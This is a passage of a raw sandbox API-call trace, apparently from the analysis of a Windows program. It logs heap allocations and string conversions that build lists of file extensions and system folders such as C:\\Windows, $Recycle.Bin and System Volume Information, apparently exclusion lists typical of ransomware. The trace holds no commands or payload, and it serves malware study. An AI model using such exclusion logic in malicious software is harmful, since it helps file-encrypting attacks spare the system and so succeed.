dwFlags=0x0, lpMem=0x2c1cfc8 | out: hHeap=0x6a0000) returned 1 [0172.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x808) returned 0x2cc50b8 [0172.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1028 | out: lpWideCharStr=".dll") returned 5 [0172.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2ccab48 [0172.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x808) returned 0x2cc50b8 [0172.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1028 | out: lpWideCharStr=".blf") returned 5 [0172.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2ccb360 [0172.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x808) returned 0x2cc50b8 [0172.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1028 | out: lpWideCharStr=".bat") returned 5 [0172.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2cd0048 [0172.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x138) returned 0x6d5c88 [0172.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762c90 | out: hHeap=0x6a0000) returned 1 [0172.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x808) returned 0x2cc50b8 [0172.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1028 | out: lpWideCharStr=".lnk") returned 5 [0172.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2cd0860 [0172.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x818) returned 0x2cc50b8 [0172.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1036 | out: lpWideCharStr=".regtrans-ms") returned 13 [0172.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cd1078 [0172.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x818) returned 0x2cc50b8 [0172.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1036 | out: lpWideCharStr="C:\\SystemID\\") returned 13 [0172.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cd18a0 [0172.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82c) returned 0x2cc50b8 [0172.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c4f5d0, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1046 | out: lpWideCharStr="C:\\Users\\Default User\\") returned 23 [0172.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cd20c8 [0172.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c8) returned 0x2ccec70 [0172.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0172.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cc50b8 [0172.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c4f5d0, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0172.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cd2900 [0172.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x826) returned 0x2cc50b8 [0172.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c4f5d0, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1043 | out: lpWideCharStr="C:\\Users\\All Users\\") returned 20 [0172.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cd3138 [0172.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x822) returned 0x2cc50b8 [0172.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c4f5d0, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1041 | out: lpWideCharStr="C:\\Users\\Default\\") returned 18 [0172.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cd3970 [0172.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x834) returned 0x2cc50b8 [0172.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c4f5d0, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1050 | out: lpWideCharStr="C:\\Documents and Settings\\") returned 27 [0172.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2cd41a8 [0172.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x81e) returned 0x2cc50b8 [0172.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1039 | out: lpWideCharStr="C:\\ProgramData\\") returned 16 [0172.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cd49f0 [0172.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x818) returned 0x2cc50b8 [0172.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1036 | out: lpWideCharStr="C:\\Recovery\\") returned 13 [0172.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cd5218 [0172.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2a0) returned 0x2ccfcb8 [0172.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccec70 | out: hHeap=0x6a0000) returned 1 [0172.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x83a) returned 0x2cc50b8 [0172.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c4f5d0, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1053 | out: lpWideCharStr="C:\\System Volume Information\\") returned 30 [0172.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2cd5a40 [0172.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ac8 [0172.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x848) returned 0x2cc50b8 [0172.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c84ac8, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1060 | out: lpWideCharStr="C:\\Users\\%username%\\AppData\\Roaming\\") returned 37 [0172.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2cd6288 [0172.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ac8 | out: hHeap=0x6a0000) returned 1 [0172.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ac8 [0172.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x844) returned 0x2cc50b8 [0172.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c84ac8, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1058 | out: lpWideCharStr="C:\\Users\\%username%\\AppData\\Local\\") returned 35 [0172.912] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2cd6ae0 [0172.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ac8 | out: hHeap=0x6a0000) returned 1 [0172.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x816) returned 0x2cc50b8 [0172.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1035 | out: lpWideCharStr="C:\\Windows\\") returned 12 [0172.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cd7338 [0172.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x818) returned 0x2cc50b8 [0172.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1036 | out: lpWideCharStr="C:\\PerfLogs\\") returned 13 [0172.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cd7b60 [0172.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x832) returned 0x2cc50b8 [0172.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c4f5d0, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1049 | out: lpWideCharStr="C:\\ProgramData\\Microsoft\\") returned 26 [0172.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2cd8388 [0172.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x83a) returned 0x2cc50b8 [0172.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c4f5d0, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1053 | out: lpWideCharStr="C:\\ProgramData\\Package Cache\\") returned 30 [0172.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2cd8bd0 [0172.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cc50b8 [0172.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c4f5d0, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0172.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cd9418 [0172.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2cc50b8 [0172.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c4f5d0, cbMultiByte=-1, lpWideCharStr=0x2cc50b8, cchWideChar=1040 | out: lpWideCharStr="C:\\$Recycle.Bin\\") returned 17 [0172.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2cd9c50 [0172.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc50b8 | out: hHeap=0x6a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f0) returned 0x2ccdc28 [0172.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccfcb8 | out: hHeap=0x6a0000) returned 1 [0172.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5f8 [0172.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5f8 | out: hHeap=0x6a0000) returned 1 [0172.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4f5d0 | out: hHeap=0x6a0000) returned 1 [0172.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2c4f5d0 [0172.923] 